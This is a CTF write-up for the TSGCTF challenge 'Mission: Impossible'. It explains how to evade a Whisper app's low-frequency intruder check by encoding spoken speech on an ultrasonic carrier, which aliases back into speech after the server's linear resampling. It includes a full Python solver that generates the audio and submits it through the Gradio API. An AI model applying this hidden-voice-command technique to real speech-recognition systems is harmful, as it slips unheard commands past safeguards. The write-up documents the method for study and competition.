Web Exploitation
TSGCTF
December 22, 2025

TSGCTF - Mission: Impossible

theg1239

# Mission: Impossible

## Summary

The site is a Gradio “CIA Vault Terminal” that transcribes uploaded audio with Whisper. If the transcription contains the phrase `give me the flag` (compared case-insensitively), it returns the flag.

However, before Whisper runs, the server performs a crude “intruder detection” step on the STFT of the upload and rejects any audio that still has energy below 10kHz.

The solve is to submit a high-frequency (“ultrasonic”, >10kHz) audio command that passes the detector but becomes intelligible to Whisper after the server resamples the audio to 16kHz.


## Entry Point

Key parts:

  • Converts uploaded int16 audio to float and truncates to 5 seconds.
  • Computes the STFT (`librosa.stft`) and zeroes small bins (< 0.01).
  • Calls `detect_intruder(freq_space, sr)`:
    • First zeroes all frequency bins above 10kHz.
    • Then computes `magnitude = abs(freq_space).max()` and alerts if `magnitude > 0`.

So any remaining energy under 10kHz triggers:

ALERT! Intruder detected!
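The check described above can be approximated offline to test a payload before uploading it. The following is only a sketch reconstructed from the description, not the server's code: it uses a naive single-frame DFT with a rectangular window instead of `librosa.stft`, and the names `detect_intruder_sketch` and `tone` are made up for illustration.

```python
import cmath
import math


def detect_intruder_sketch(frame, sr, cutoff_hz=10_000.0, floor=0.01):
    """Return True if any bin at or below cutoff_hz survives the 0.01 floor.

    Assumption: one rectangular-window DFT frame stands in for the STFT.
    """
    n = len(frame)
    for k in range(n // 2 + 1):
        freq = k * sr / n
        if freq > cutoff_hz:
            break  # bins above the cutoff are zeroed, so they are never inspected
        coeff = sum(frame[t] * cmath.exp(-2j * math.pi * k * t / n) for t in range(n))
        if abs(coeff) >= floor:  # bins below the floor are treated as zero
            return True
    return False


def tone(freq_hz, sr, n, amp=0.5):
    """Generate n samples of a cosine at freq_hz."""
    return [amp * math.cos(2 * math.pi * freq_hz * t / sr) for t in range(n)]


SR = 48_000
N = 480  # 100 Hz per bin, so both test tones fall exactly on a bin

print(detect_intruder_sketch(tone(1_000, SR, N), SR))   # True: energy below 10kHz
print(detect_intruder_sketch(tone(15_000, SR, N), SR))  # False: energy only above 10kHz
```

A real STFT with a Hann window leaks slightly into neighbouring bins, so a payload that passes this sketch should still keep a safety margin above the cutoff.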

If it passes, audio is resampled:

```python
wave = librosa.resample(wave, orig_sr=sr, target_sr=16000, res_type="linear")
result = whisper.transcribe(model, wave, temperature=0.0)["text"]
```

Then:

```python
if "give me the flag" in result.lower():
    return "OK, here is the flag: " + FLAG
```

## Vulnerability / Idea

The “intruder detector” is effectively a low-frequency energy detector:

  • It removes everything above 10kHz before checking magnitude.
  • Therefore, if we send audio whose energy is entirely above 10kHz, the detector sees (almost) nothing.

But then the server resamples to 16kHz with `res_type="linear"`. Linear interpolation is not a proper anti-aliasing low-pass filter, so content above the new Nyquist frequency (8kHz) can alias (fold) into the audible band instead of being removed.

So we want:

  1. An uploaded waveform with almost no <10kHz energy (to avoid the alert)
  2. After resampling to 16kHz, the aliased signal resembles speech enough for Whisper to transcribe “give me the flag”
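The folding effect can be reproduced without any audio libraries. The sketch below uses a naive linear-interpolation resampler, `resample_linear`, as a stand-in for the server's resampling step. It is a hypothetical helper, not librosa's implementation, and it assumes the output samples are aligned to the start of the input. A 17kHz tone sampled at 48kHz comes out of it as a 1kHz tone at 16kHz.

```python
import math


def resample_linear(x, sr_in, sr_out):
    """Naive linear-interpolation resampler with no anti-aliasing filter."""
    n_out = len(x) * sr_out // sr_in
    out = []
    for j in range(n_out):
        pos = j * sr_in / sr_out          # fractional read position in the input
        i = int(pos)
        frac = pos - i
        nxt = x[i + 1] if i + 1 < len(x) else x[i]
        out.append(x[i] * (1.0 - frac) + nxt * frac)
    return out


SR_IN, SR_OUT = 48_000, 16_000

# 0.1 s of a 17kHz tone at 48kHz, and the 1kHz tone we expect after folding.
hi = [math.cos(2 * math.pi * 17_000 * n / SR_IN) for n in range(4800)]
lo = [math.cos(2 * math.pi * 1_000 * k / SR_OUT) for k in range(1600)]

folded = resample_linear(hi, SR_IN, SR_OUT)
max_err = max(abs(a - b) for a, b in zip(folded, lo))
print(len(folded), max_err < 1e-9)  # 1600 True
```

At an exact 3:1 ratio the interpolation weight is always zero, so the resampler just keeps every third sample, and 17kHz lands on 17 - 16 = 1kHz.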

## Exploit Approach

I generate a clean TTS sample of the command phrase at 16kHz (the solver shells out to the macOS `say` command for this), then encode it into an ultrasonic AM waveform at 48kHz:

  • Start with baseband speech m(t) (low-passed to ~3.5kHz).
  • Upsample 16kHz → 48kHz with simple linear interpolation.
  • Multiply by a cosine carrier at $f_c = 16000$ Hz to shift energy above 10kHz:

$$y[n] = m[n] \cdot \cos(2\pi f_c n / 48000)$$

  • Optionally apply a high-pass around ~10.5kHz to reduce any residual leakage.

The final audio mostly lives above 10kHz (passes the detector), but the resampling step reintroduces intelligible content for Whisper.
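A short derivation shows why a 16kHz carrier is a convenient choice. It assumes that resampling 48kHz to 16kHz by linear interpolation amounts to keeping every third sample ($n = 3k$), which holds for an idealized resampler aligned to the first sample; the server's actual sample alignment may differ. With $f_c = 16000$ Hz:

$$
y[3k] = m[3k] \cdot \cos\!\left(\frac{2\pi \cdot 16000 \cdot 3k}{48000}\right) = m[3k] \cdot \cos(2\pi k) = m[3k]
$$

Under that assumption the carrier collapses to 1 at every retained sample, and the resampled signal is the baseband speech again. Before resampling, speech band-limited to about 3.5kHz occupies roughly $16000 \pm 3500$ Hz, i.e. 12.5kHz to 19.5kHz, which sits above the 10kHz detector cutoff and below the 24kHz Nyquist limit of the 48kHz upload.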

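In practice, repeating the phrase once improved Whisper reliability. The solver's `--text` default is the single phrase, so the repeated version has to be passed explicitly: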

"give me the flag give me the flag"


## Automation (Gradio API)

The UI says “Use via API”, and the page exposes its config (window.gradio_config) with api_prefix=/gradio_api.

The solver uses:

  1. POST /gradio_api/upload (multipart) to upload the WAV
  2. POST /gradio_api/call/predict with JSON {"data": [FileData]}
  3. GET /gradio_api/call/predict/<event_id> (SSE) to read the final text output
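Step 3 returns a server-sent event stream rather than a single JSON body. The sketch below parses such a stream offline and picks out the final payload. The event names `heartbeat` and `complete` and the sample stream are assumptions based on how Gradio's `/call` endpoints typically respond, and the helper names `parse_sse_events` and `final_output` are invented for illustration.

```python
import json


def parse_sse_events(stream_text):
    """Split an SSE body into (event, data) pairs; data is kept as a raw string."""
    events = []
    event, data_lines = "message", []
    for line in stream_text.splitlines():
        if line == "":
            # A blank line terminates the current event.
            if data_lines:
                events.append((event, "\n".join(data_lines)))
            event, data_lines = "message", []
        elif line.startswith("event:"):
            event = line[len("event:"):].strip()
        elif line.startswith("data:"):
            data_lines.append(line[len("data:"):].strip())
    if data_lines:
        events.append((event, "\n".join(data_lines)))
    return events


def final_output(stream_text):
    """Return the decoded payload of the first 'complete' event, or None."""
    for event, data in parse_sse_events(stream_text):
        if event == "complete":
            return json.loads(data)
    return None


# Hypothetical stream with a placeholder flag, for illustration only.
sample = (
    "event: heartbeat\ndata: null\n\n"
    'event: complete\ndata: ["OK, here is the flag: TSGCTF{example}"]\n\n'
)
print(final_output(sample))
```

Filtering on the event name is stricter than returning the first `data:` line that decodes to a list, which is what the solver does.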

## Solver

The full solver is listed at the end of this writeup.

## Flag

TSGCTF{Th1S_fl4g_wiLL_s3lf-deSTrucT_in_5_s3c0nds}
solve.sh - z0d1ak@ctf
#!/usr/bin/env python3
import argparse
import array
import json
import math
import os
import re
import subprocess
import sys
import tempfile
import time
import urllib.error
import urllib.request
import uuid
import wave
from dataclasses import dataclass

FLAG_RE = re.compile(r"TSGCTF\{[^\n\r}]*\}")


@dataclass
class Target:
    base_url: str

    @property
    def api_prefix(self) -> str:
        return self.base_url.rstrip("/") + "/gradio_api"


def run_say_to_wav(out_wav: str, text: str, sr: int = 44100, rate_wpm: int | None = None, voice: str | None = None):
    cmd = [
        "say",
        *( ["-v", voice] if voice else [] ),
        *( ["-r", str(rate_wpm)] if rate_wpm else [] ),
        "-o",
        out_wav,
        "--file-format=WAVE",
        f"--data-format=LEI16@{sr}",
        text,
    ]
    subprocess.check_call(cmd)


def read_wav_mono_int16(path: str):
    with wave.open(path, "rb") as wf:
        nch = wf.getnchannels()
        sampwidth = wf.getsampwidth()
        sr = wf.getframerate()
        nframes = wf.getnframes()
        if sampwidth != 2:
            raise ValueError(f"expected 16-bit PCM wav, got sampwidth={sampwidth}")
        raw = wf.readframes(nframes)
    audio = array.array("h")
    audio.frombytes(raw)

    if nch == 1:
        return sr, audio
    if nch == 2:
        mono = array.array("h")
        # average L/R
        for i in range(0, len(audio), 2):
            mono.append(int((int(audio[i]) + int(audio[i + 1])) / 2))
        return sr, mono
    raise ValueError(f"unsupported channels: {nch}")


def write_wav_mono_int16(path: str, sr: int, audio_i16):
    if isinstance(audio_i16, array.array):
        if audio_i16.typecode != "h":
            raise ValueError("audio_i16 must be int16 array('h')")
        data_bytes = audio_i16.tobytes()
    else:
        a = array.array("h", audio_i16)
        data_bytes = a.tobytes()
    with wave.open(path, "wb") as wf:
        wf.setnchannels(1)
        wf.setsampwidth(2)
        wf.setframerate(sr)
        wf.writeframes(data_bytes)


def ultrasonic_shift(
    base_i16,
    sr: int,
    carrier_hz: float = 15000.0,
    max_amp: float = 0.05,
    lp_cutoff_hz: float = 3500.0,
    hp_cutoff_hz: float = 10500.0,
):
    if not isinstance(base_i16, array.array) or base_i16.typecode != "h":
        base_i16 = array.array("h", base_i16)

    if len(base_i16) == 0:
        raise ValueError("empty audio")

    mean = sum(int(s) for s in base_i16) / float(len(base_i16))

    dt = 1.0 / float(sr)

    # Low-pass baseband speech to reduce bandwidth before upconverting.
    lp_alpha = None
    if lp_cutoff_hz and lp_cutoff_hz > 0:
        rc_lp = 1.0 / (2.0 * math.pi * float(lp_cutoff_hz))
        lp_alpha = dt / (rc_lp + dt)

    w = 2.0 * math.pi * float(carrier_hz) / float(sr)
    phase = 0.0
    y_f = [0.0] * len(base_i16)
    lp_state = 0.0
    for i, s in enumerate(base_i16):
        x = (float(int(s)) - mean) / 32768.0
        if lp_alpha is not None:
            lp_state = lp_state + lp_alpha * (x - lp_state)
            x = lp_state
        y_f[i] = x * math.cos(phase)
        phase += w

    # High-pass to kill any low-frequency leakage.
    if hp_cutoff_hz and hp_cutoff_hz > 0:
        # dt already computed above
        rc = 1.0 / (2.0 * math.pi * float(hp_cutoff_hz))
        alpha = rc / (rc + dt)
        hp = [0.0] * len(y_f)
        prev_x = y_f[0]
        prev_y = 0.0
        hp[0] = 0.0
        for i in range(1, len(y_f)):
            x = y_f[i]
            y = alpha * (prev_y + x - prev_x)
            hp[i] = y
            prev_x = x
            prev_y = y
        y_f = hp

    peak = max(abs(v) for v in y_f) if y_f else 0.0

    if peak < 1e-12:
        raise ValueError("unexpected near-silence from TTS")

    scale = float(max_amp) / peak
    out = array.array("h")
    for y in y_f:
        v = int(round(y * scale * 32767.0))
        if v > 32767:
            v = 32767
        elif v < -32768:
            v = -32768
        out.append(v)
    return out


def lowpass_iir(samples_f, sr: int, cutoff_hz: float):
    if not cutoff_hz or cutoff_hz <= 0:
        return list(samples_f)
    dt = 1.0 / float(sr)
    rc = 1.0 / (2.0 * math.pi * float(cutoff_hz))
    alpha = dt / (rc + dt)
    y = 0.0
    out = []
    for x in samples_f:
        y = y + alpha * (x - y)
        out.append(y)
    return out


def encode_ultrasonic(
    base16_i16: array.array,
    max_amp: float = 0.9,
    lp_cutoff_hz: float = 3500.0,
    carrier_hz: float = 16000.0,
    hp_cutoff_hz: float = 10500.0,
):
    """Encode 16kHz speech into an ultrasonic (48kHz) AM signal.

    Key detail: we upsample the envelope by 3 using linear interpolation to avoid images at 16kHz.
    Then we modulate with a 16kHz carrier so all energy stays above the 10kHz detector cutoff.
    """
    if base16_i16.typecode != "h":
        raise ValueError("base16_i16 must be array('h')")

    x16 = [float(int(s)) / 32768.0 for s in base16_i16]
    x16 = lowpass_iir(x16, sr=16000, cutoff_hz=lp_cutoff_hz)

    # Upsample 16k -> 48k (x3) with linear interpolation.
    x48 = []
    for i in range(len(x16) - 1):
        a = x16[i]
        b = x16[i + 1]
        x48.append(a)
        x48.append(a + (b - a) / 3.0)
        x48.append(a + 2.0 * (b - a) / 3.0)
    if x16:
        x48.extend([x16[-1], x16[-1], x16[-1]])

    peak = max(abs(v) for v in x48) if x48 else 0.0
    if peak < 1e-12:
        raise ValueError("unexpected near-silence from TTS")
    scale = float(max_amp) / peak

    w = 2.0 * math.pi * float(carrier_hz) / 48000.0
    phase = 0.0
    y48 = [0.0] * len(x48)
    for i, v in enumerate(x48):
        y48[i] = (v * scale) * math.cos(phase)
        phase += w

    # Optional high-pass to remove any residual <10k leakage.
    if hp_cutoff_hz and hp_cutoff_hz > 0:
        dt = 1.0 / 48000.0
        rc = 1.0 / (2.0 * math.pi * float(hp_cutoff_hz))
        alpha = rc / (rc + dt)
        prev_x = y48[0]
        prev_y = 0.0
        for i in range(1, len(y48)):
            x = y48[i]
            y = alpha * (prev_y + x - prev_x)
            y48[i] = y
            prev_x = x
            prev_y = y
        y48[0] = 0.0

    out = array.array("h")
    for a in y48:
        iv = int(round(a * 32767.0))
        if iv > 32767:
            iv = 32767
        elif iv < -32768:
            iv = -32768
        out.append(iv)
    return 48000, out


def http_post_multipart(url: str, field_name: str, filename: str, content_type: str, data: bytes, timeout_s: float = 20.0):
    boundary = "----WebKitFormBoundary" + uuid.uuid4().hex
    parts = []

    parts.append(f"--{boundary}\r\n".encode())
    parts.append(
        (
            f'Content-Disposition: form-data; name="{field_name}"; filename="{filename}"\r\n'
            f"Content-Type: {content_type}\r\n\r\n"
        ).encode()
    )
    parts.append(data)
    parts.append(b"\r\n")
    parts.append(f"--{boundary}--\r\n".encode())

    body = b"".join(parts)
    req = urllib.request.Request(url, data=body, method="POST")
    req.add_header("Content-Type", f"multipart/form-data; boundary={boundary}")
    req.add_header("Content-Length", str(len(body)))

    with urllib.request.urlopen(req, timeout=timeout_s) as resp:
        return resp.read()


def http_post_json(url: str, payload: dict, timeout_s: float = 20.0):
    data = json.dumps(payload).encode("utf-8")
    req = urllib.request.Request(url, data=data, method="POST")
    req.add_header("Content-Type", "application/json")
    with urllib.request.urlopen(req, timeout=timeout_s) as resp:
        return resp.read()


def sse_read_final_result(url: str, timeout_s: float = 60.0):
    req = urllib.request.Request(url, method="GET")
    start = time.time()
    buf = ""
    last_data = None

    with urllib.request.urlopen(req, timeout=timeout_s) as resp:
        while True:
            if time.time() - start > timeout_s:
                raise TimeoutError("SSE timeout")
            chunk = resp.readline()
            if not chunk:
                break
            line = chunk.decode("utf-8", "replace")
            buf += line
            if line.startswith("data:"):
                data_str = line[len("data:") :].strip()
                if not data_str:
                    continue
                try:
                    last_data = json.loads(data_str)
                except json.JSONDecodeError:
                    continue
                # Often the final payload is a list of outputs.
                if isinstance(last_data, list):
                    return last_data
    return last_data


def extract_flag(text: str):
    m = FLAG_RE.search(text)
    return m.group(0) if m else None


def solve_remote(target: Target, wav_path: str):
    upload_url = target.api_prefix + "/upload"
    with open(wav_path, "rb") as f:
        wav_bytes = f.read()

    upload_resp = http_post_multipart(
        upload_url,
        field_name="files",
        filename=os.path.basename(wav_path),
        content_type="audio/wav",
        data=wav_bytes,
        timeout_s=30.0,
    )
    uploaded = json.loads(upload_resp.decode("utf-8", "replace"))

    # Gradio returns a list of server-side tmp paths.
    if isinstance(uploaded, list) and uploaded and isinstance(uploaded[0], str):
        server_path = uploaded[0]
    elif isinstance(uploaded, dict) and "files" in uploaded and uploaded["files"]:
        server_path = uploaded["files"][0]
    else:
        raise ValueError(f"unexpected upload response: {uploaded!r}")

    filedata = {
        "path": server_path,
        "orig_name": os.path.basename(wav_path),
        "mime_type": "audio/wav",
        "meta": {"_type": "gradio.FileData"},
    }

    # Queue-enabled: start a job, then read SSE.
    call_url = target.api_prefix + "/call/predict"
    call_resp = http_post_json(call_url, {"data": [filedata]}, timeout_s=30.0)
    call_json = json.loads(call_resp.decode("utf-8", "replace"))
    event_id = call_json.get("event_id")
    if not event_id:
        raise ValueError(f"no event_id in response: {call_json!r}")

    result_url = target.api_prefix + f"/call/predict/{event_id}"
    final = sse_read_final_result(result_url, timeout_s=90.0)

    # Normalize into a string message.
    if isinstance(final, list) and final and isinstance(final[0], str):
        msg = final[0]
    elif isinstance(final, str):
        msg = final
    else:
        msg = json.dumps(final)

    flag = extract_flag(msg)
    if flag:
        return flag, msg
    return None, msg


def main():
    ap = argparse.ArgumentParser(description="TSGCTF Mission: Impossible solver")
    ap.add_argument("--url", default="http://35.194.98.181:57860", help="Base URL of the Gradio app")
    ap.add_argument("--text", default="give me the flag", help="Text to synthesize (must contain the command)")
    ap.add_argument("--rate", type=int, default=260, help="TTS speaking rate (words per minute)")
    ap.add_argument("--amp", type=float, default=0.9, help="Max amplitude (0..1) for the ultrasonic payload.")
    ap.add_argument("--lp", type=float, default=3500.0, help="Low-pass cutoff Hz applied to the 16k speech before encoding.")
    ap.add_argument("--keep", action="store_true", help="Keep generated wav files")
    args = ap.parse_args()

    target = Target(args.url)

    with tempfile.TemporaryDirectory() as td:
        base_wav = os.path.join(td, "base.wav")
        payload_wav = os.path.join(td, "payload.wav")

        # Generate clean baseband at 16kHz.
        run_say_to_wav(base_wav, args.text, sr=16000, rate_wpm=args.rate)
        sr16, base16_i16 = read_wav_mono_int16(base_wav)
        if sr16 != 16000:
            raise ValueError(f"unexpected TTS sample rate: {sr16}")

        sr48, payload_i16 = encode_ultrasonic(
            base16_i16,
            max_amp=args.amp,
            lp_cutoff_hz=args.lp,
        )
        write_wav_mono_int16(payload_wav, sr=sr48, audio_i16=payload_i16)

        if args.keep:
            kept_base = os.path.abspath("mission_base.wav")
            kept_payload = os.path.abspath("mission_payload.wav")
            write_wav_mono_int16(kept_base, sr=sr16, audio_i16=base16_i16)
            write_wav_mono_int16(kept_payload, sr=sr48, audio_i16=payload_i16)
            print(f"kept: {kept_base}")
            print(f"kept: {kept_payload}")

        flag, msg = solve_remote(target, payload_wav)
        if flag:
            print(flag)
        else:
            print(msg)
            raise SystemExit("Flag not found")


if __name__ == "__main__":
    main()
